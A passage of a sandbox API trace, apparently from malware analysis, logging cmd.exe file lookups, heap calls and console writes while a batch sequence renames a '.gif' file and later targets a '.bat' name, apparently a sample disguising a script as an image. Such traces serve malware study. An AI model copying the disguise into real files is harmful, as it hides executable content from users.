(HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x26) returned 0x21ed8d45ce0 [0148.504] ??_V@YAXPEAX@Z () returned 0x1 [0148.504] malloc (_Size=0x1ff9c) returned 0x21ed91bfe00 [0148.504] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d43810 [0148.504] FindClose (in: hFindFile=0x21ed8d43810 | out: hFindFile=0x21ed8d43810) returned 1 [0148.504] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d433f0 [0148.504] FindClose (in: hFindFile=0x21ed8d433f0 | out: hFindFile=0x21ed8d433f0) returned 1 [0148.505] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x82f1e5c5, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x82f1e5c5, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d43810 [0148.505] FindClose (in: hFindFile=0x21ed8d43810 | out: hFindFile=0x21ed8d43810) returned 1 [0148.505] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\jQv-1A.gif", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0047750, ftCreationTime.dwHighDateTime=0x1d5e9db, ftLastAccessTime.dwLowDateTime=0xc70c040, ftLastAccessTime.dwHighDateTime=0x1d5e8b8, ftLastWriteTime.dwLowDateTime=0xc70c040, ftLastWriteTime.dwHighDateTime=0x1d5e8b8, nFileSizeHigh=0x0, nFileSizeLow=0xdffe, dwReserved0=0x4, dwReserved1=0x80, cFileName="jQv-1A.gif", cAlternateFileName="")) returned 0x21ed8d43810 [0148.505] FindClose (in: hFindFile=0x21ed8d43810 | out: hFindFile=0x21ed8d43810) returned 1 [0148.505] malloc (_Size=0x1ff9c) returned 0x21ed91dfdb0 [0148.506] ??_V@YAXPEAX@Z () returned 0x21ed91dfdb0 [0148.507] GetProcessHeap () returned 0x21ed8c70000 [0148.507] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1e) returned 0x21ed8d45bc0 [0148.507] ??_V@YAXPEAX@Z () returned 0x1 [0148.507] ??_V@YAXPEAX@Z () returned 0x1 [0148.507] GetProcessHeap () returned 0x21ed8c70000 [0148.507] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9377410, Size=0x120) returned 0x21ed9377410 [0148.507] GetProcessHeap () returned 0x21ed8c70000 [0148.507] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9377410) returned 0x120 [0148.507] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0148.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.507] GetFileType (hFile=0x50) returned 0x2 [0148.507] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0148.507] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0148.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.526] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0148.554] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0148.554] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0148.554] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0148.554] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.554] GetFileType (hFile=0x50) returned 0x2 [0148.554] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0148.554] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0148.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.685] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0148.698] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.698] GetFileType (hFile=0x50) returned 0x2 [0148.698] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0148.699] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0148.704] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.704] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9376fd0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9376fd0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0148.732] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"jQv-1A.gif\" \"jQv-1A.gif.Sister\" ") returned 34 [0148.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.733] GetFileType (hFile=0x50) returned 0x2 [0148.733] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0148.733] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0148.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.735] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x22, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x22) returned 1 [0148.737] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0148.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.737] GetFileType (hFile=0x50) returned 0x2 [0148.737] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0148.737] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0148.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0148.910] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0149.003] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0149.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.003] GetFileType (hFile=0x50) returned 0x2 [0149.004] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0149.004] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0149.091] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.091] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0149.134] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0149.135] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.135] GetFileType (hFile=0x50) returned 0x2 [0149.135] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0149.135] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0149.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.174] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0149.245] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0149.245] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.245] GetFileType (hFile=0x50) returned 0x2 [0149.245] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0149.245] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0149.341] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.341] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0149.609] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.609] GetFileType (hFile=0x50) returned 0x2 [0149.609] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0149.609] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0149.700] _get_osfhandle (_FileHandle=1) returned 0x50 [0149.700] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93773e0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed93773e0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0150.104] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"jQv-1A.gif.Sister\" \"jQv-1A.bat\" ") returned 34 [0150.104] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.104] GetFileType (hFile=0x50) returned 0x2 [0150.104] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0150.104] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0150.214] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.214] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x22, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x22) returned 1 [0150.268] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0150.268] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.268] GetFileType (hFile=0x50) returned 0x2 [0150.269] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0150.269] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0150.295] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.295] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0150.363] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0150.404] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0150.404] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0150.404] malloc (_Size=0xffce) returned 0x21ed91bfe00 [0150.404] ??_V@YAXPEAX@Z () returned 0x21ed91bfe00 [0150.404] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0150.404] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0150.404] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0150.404] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0150.404] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0150.404] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0150.404] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0150.404] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0150.404] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0150.404] ??_V@YAXPEAX@Z () returned 0x1 [0150.404] GetProcessHeap () returned 0x21ed8c70000 [0150.404] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x98) returned 0x21ed8d663d0 [0150.405] GetProcessHeap () returned 0x21ed8c70000 [0150.405] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d663d0, Size=0x54) returned 0x21ed8d663d0 [0150.405] GetProcessHeap () returned 0x21ed8c70000 [0150.405] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d663d0) returned 0x54 [0150.405] GetProcessHeap () returned 0x21ed8c70000 [0150.405] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x5c) returned 0x21ed8d66440 [0150.405] GetProcessHeap () returned 0x21ed8c70000 [0150.405] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x98) returned 0x21ed8d664b0 [0150.405] GetProcessHeap () returned 0x21ed8c70000 [0150.405] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d664b0, Size=0x54) returned 0x21ed8d664b0 [0150.405] GetProcessHeap () returned 0x21ed8c70000 [0150.405] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d664b0) returned 0x54 [0150.405] malloc (_Size=0xffce) returned 0x21ed91bfe00 [0150.405] ??_V@YAXPEAX@Z () returned 0x21ed91bfe00 [0150.405] GetProcessHeap () returned 0x21ed8c70000 [0150.405] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d43810 [0150.405] GetProcessHeap () returned 0x21ed8c70000 [0150.405] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9375f20 [0150.405] _wcsicmp (_String1="jQv-1A.gif", _String2=".") returned 60 [0150.405] _wcsicmp (_String1="jQv-1A.gif", _String2="..") returned 60 [0150.405] GetFileAttributesW (lpFileName="jQv-1A.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\jqv-1a.gif")) returned 0x20 [0150.406] GetProcessHeap () returned 0x21ed8c70000 [0150.406] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93d0210 [0150.407] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93d0220 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0150.407] SetErrorMode (uMode=0x0) returned 0x0 [0150.407] SetErrorMode (uMode=0x1) returned 0x0 [0150.407] GetFullPathNameW (in: lpFileName="jQv-1A.gif", nBufferLength=0x7fe7, lpBuffer=0x21ed91bfe00, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\jQv-1A.gif", lpFilePart=0xa6cf4fd660*="jQv-1A.gif") returned 0x22 [0150.407] SetErrorMode (uMode=0x0) returned 0x1 [0150.408] GetProcessHeap () returned 0x21ed8c70000 [0150.408] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9373f70 [0150.408] _wcsicmp (_String1="jQv-1A.gif", _String2=".") returned 60 [0150.408] _wcsicmp (_String1="jQv-1A.gif", _String2="..") returned 60 [0150.408] GetFileAttributesW (lpFileName="jQv-1A.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\jqv-1a.gif")) returned 0x20 [0150.408] ??_V@YAXPEAX@Z () returned 0x1 [0150.408] malloc (_Size=0xffce) returned 0x21ed91bfe00 [0150.408] ??_V@YAXPEAX@Z () returned 0x21ed91bfe00 [0150.408] malloc (_Size=0xffce) returned 0x21ed91cfde0 [0150.408] ??_V@YAXPEAX@Z () returned 0x21ed91cfde0 [0150.408] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\jQv-1A.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\jqv-1a.gif")) returned 0x20 [0150.408] malloc (_Size=0xffce) returned 0x21ed91dfdc0 [0150.408] ??_V@YAXPEAX@Z () returned 0x21ed91dfdc0 [0150.408] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\jQv-1A.gif", fInfoLevelId=0x1, lpFindFileData=0x21ed9375f30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9375f30) returned 0x21ed8d433f0 [0150.409] malloc (_Size=0xffce) returned 0x21ed91efda0 [0150.409] ??_V@YAXPEAX@Z () returned 0x21ed91efda0 [0150.409] ??_V@YAXPEAX@Z () returned 0x1 [0150.409] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\jQv-1A.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\jqv-1a.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\jQv-1A.gif.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\jqv-1a.gif.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0150.410] FindNextFileW (in: hFindFile=0x21ed8d433f0, lpFindFileData=0x21ed9375f30 | out: lpFindFileData=0x21ed9375f30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0047750, ftCreationTime.dwHighDateTime=0x1d5e9db, ftLastAccessTime.dwLowDateTime=0xc70c040, ftLastAccessTime.dwHighDateTime=0x1d5e8b8, ftLastWriteTime.dwLowDateTime=0xc70c040, ftLastWriteTime.dwHighDateTime=0x1d5e8b8, nFileSizeHigh=0x0, nFileSizeLow=0xdffe, dwReserved0=0x0, dwReserved1=0x0, cFileName="jQv-1A.gif", cAlternateFileName="")) returned 0 [0150.412] GetLastError () returned 0x12 [0150.412] FindClose (in: hFindFile=0x21ed8d433f0 | out: hFindFile=0x21ed8d433f0) returned 1 [0150.412] ??_V@YAXPEAX@Z () returned 0x1 [0150.412] ??_V@YAXPEAX@Z () returned 0x1 [0150.413] ??_V@YAXPEAX@Z () returned 0x1 [0150.414] ??_V@YAXPEAX@Z () returned 0x1 [0150.414] GetProcessHeap () returned 0x21ed8c70000 [0150.414] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d433f0 [0150.414] GetProcessHeap () returned 0x21ed8c70000 [0150.414] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95500, Size=0x16) returned 0x21ed8c95640 [0150.414] GetProcessHeap () returned 0x21ed8c70000 [0150.414] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95640) returned 0x16 [0150.414] GetProcessHeap () returned 0x21ed8c70000 [0150.414] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0150.414] GetProcessHeap () returned 0x21ed8c70000 [0150.414] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0150.414] GetProcessHeap () returned 0x21ed8c70000 [0150.414] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d66d90 [0150.414] GetProcessHeap () returned 0x21ed8c70000 [0150.414] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66d90, Size=0xb2) returned 0x21ed8d66d90 [0150.414] GetProcessHeap () returned 0x21ed8c70000 [0150.414] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66d90) returned 0xb2 [0150.414] GetProcessHeap () returned 0x21ed8c70000 [0150.414] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9377540 [0150.415] GetProcessHeap () returned 0x21ed8c70000 [0150.415] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9377540, Size=0x30) returned 0x21ed9377540 [0150.415] GetProcessHeap () returned 0x21ed8c70000 [0150.415] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9377540) returned 0x30 [0150.415] GetProcessHeap () returned 0x21ed8c70000 [0150.415] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9377580 [0150.415] malloc (_Size=0x1ff9c) returned 0x21ed91bfe00 [0150.416] GetProcessHeap () returned 0x21ed8c70000 [0150.416] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d47810 [0150.416] GetProcessHeap () returned 0x21ed8c70000 [0150.416] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8d484d0 [0150.416] ??_V@YAXPEAX@Z () returned 0x1 [0150.416] malloc (_Size=0x1ff9c) returned 0x21ed91bfe00 [0150.416] GetProcessHeap () returned 0x21ed8c70000 [0150.416] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8d47b10 [0150.416] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed91bfe00, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0150.416] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d66460, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d42f10 [0150.416] FindClose (in: hFindFile=0x21ed8d42f10 | out: hFindFile=0x21ed8d42f10) returned 1 [0150.417] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d66460, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d42f10 [0150.417] FindClose (in: hFindFile=0x21ed8d42f10 | out: hFindFile=0x21ed8d42f10) returned 1 [0150.417] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x844288f7, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x844288f7, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d66460, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d439f0 [0150.417] FindClose (in: hFindFile=0x21ed8d439f0 | out: hFindFile=0x21ed8d439f0) returned 1 [0150.417] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x844288f7, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x844288f7, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d66460, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0150.417] malloc (_Size=0x1ff9c) returned 0x21ed91dfdb0 [0150.417] ??_V@YAXPEAX@Z () returned 0x21ed91dfdb0 [0150.419] GetProcessHeap () returned 0x21ed8c70000 [0150.419] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67030 [0150.419] ??_V@YAXPEAX@Z () returned 0x1 [0150.419] ??_V@YAXPEAX@Z () returned 0x1 [0150.419] GetProcessHeap () returned 0x21ed8c70000 [0150.419] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9377580, Size=0x490) returned 0x21ed9377580 [0150.419] GetProcessHeap () returned 0x21ed8c70000 [0150.419] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9377580) returned 0x490 [0150.419] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0150.419] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.419] GetFileType (hFile=0x50) returned 0x2 [0150.419] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0150.419] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0150.444] _get_osfhandle (_FileHandle=1) returned 0x50 [0150.444] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, 